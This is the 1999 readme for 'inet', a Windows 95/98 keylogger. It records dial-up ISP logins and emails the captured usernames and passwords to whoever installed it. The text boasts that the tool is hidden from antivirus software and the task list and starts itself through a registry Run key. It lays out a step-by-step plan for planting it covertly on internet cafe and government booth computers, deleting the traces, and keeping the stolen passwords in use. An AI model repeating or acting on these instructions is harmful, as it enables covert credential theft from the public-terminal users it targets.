by Mandrake the Magician
Written in Delphi
Released on February 24, 1999
Program: inet -- Keystroke Recorder for Post Terminal Screen and Connect To screen + mail sender with that info. Version: 2.0 (Freeware). Released: 24th February 99. Original Creator : Mandrake the Magician *********** Disclaimer: The author will not be responsible for anything! *********** ----------------------------------------------------------------------------- target machine means the machine on which the program is installed. ------------------------------------------------------------------------------ Main features: * Once installed you get the passwords + username of the target machine by mail * Auto load at start-up. * Subsequent mail is (supposed to be) sent only when there is a change in password. * Will not be detected by any antivirus software. * Can't be seen even in the tasklist got by pressing Ctrl-Alt-Del -------------------------- **************|Where it will not work ?|*************************** | *** | ------------------------- * On a machine running any other operating system than Win95 or Win 98. * Where they are sharing a dial-up connection using Web Ramp or similar tools. * Where they are using leased line. * Where they are using a proxy server to share a modem.(If you can get the program installed on the machine which has the modem then it might work) Introduction: ------------- inet.EXE is a Windows 95/98 freeware utility that records keystrokes on the Post Terminal Screen (the screen that comes once you connect to VSNL or any other ISP without scripting) and Connect To screen (the one that comes when you click a phone book entry of dial-up networking) It then sends the username and password if the guy uses scripting.If the victim uses the Post-Terminal Screen whatever is typed in the post terminal screen will be sent.The mail is sent automatically when the machine on which the program is installed, is connected to the internet.You have the option of setting the e-mail address (the one to which the passwords will be sent)at install time. Details are given below in the **What you need to do ?**section The program does no harm to the system as such.It will not be detected by any antivirus programs, as it is not a virus. How it works ? -------------- The program was written in Delphi 3.The main executable loads a keyboard hook when it detects the Post-Terminal Screen or Connect To screen. It saves whatever is typed in the post-terminal screen or Connect To screen of win95/98 to a file.The collected information is sent as e-mail as soon as the machine which has the program installed is connected to the internet.Once the mail is sent the progarm terminates.It gets loaded again on the next windows start-up.Mail is sent again only if there is a change in password. What you need to do ? --------------------- You are reading the inet.TXT file which has instructions on installation & usage.You should not put this file on the target machine for obvious reasons. 1) Run the self-extracting setup program setup.EXE. 2) You will prompted for an e-mail address,Enter the address to which the passwords will be sent. 4) Delete setup.exe to remove any traces. That's it. You can expect two e-mails if you installed the program while you were connected to the net.The first one will be without password if the user typed the password in the post terminal screen or on the Connect To screen.But the second one,which 'll be sent when the target machine connects to the net the second time.Subsequent mails are supposed to arrive only when the user has changed the passwords. Preferred Modus Operandi:(for internet booths -Hope you have read where it won't work above) Download the setup.exe from http://members.xoom.com/mmandrake.Then send this file as an attachment to your own hotmail/any mail account. There are a lot internet cafe's now who are screwing people with high charges.They are easy targets.Go to Department of Telecom's booth if at all possible.(Government's money is everyone's money :) Now go in with the pretext of checking mail at your hotmail account. Check your account which has the files.Download the attachment setup.exe and run it(as per Step1). If you used the Save to disk option while downloading,its advisable to delete it(setup.exe) before you leave the place. Check your mail (account specified in the file e) later and Presto You Have The Passwords - Always. At any time there is a change you are updated. Uninstallation: The files inet.exe,isys.dll,isys.sys gets copied to the system directory (default is C:\WINDOWS\SYSTEM)inet.exe and isys.dll can't be deleted directly if the program is runing. To close the program Go to the Start Menu,select Run and just type inet.exe and hit enter. Now the program gets closed and you can delete all the above mentioned files in the system directory. There are two registry entries made by the program and you can delete that also if you are familiar with the registry. The entries are HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Inet HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Send Or you can use the uninstallation program at my site members.xoom.com/mmandrake ---------------------------------------------- End Note: ---------------------------------------------- After reading all these long instructions you might be pretty bored.And you might perhaps have a natural question What's my benefit ? I saw guys struggling for passwords in all those password mailing lists.So I thought I'll share the program which Iam using to get passwords with others.Lets make it a free world. One last advice: Once you get the password please do not change it.It helps no one. Bye for now . You can always send comments and problems, if any, regarding this program to [email protected] Server: size: 67,072 bytes startup: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run "inet"MegaSecurity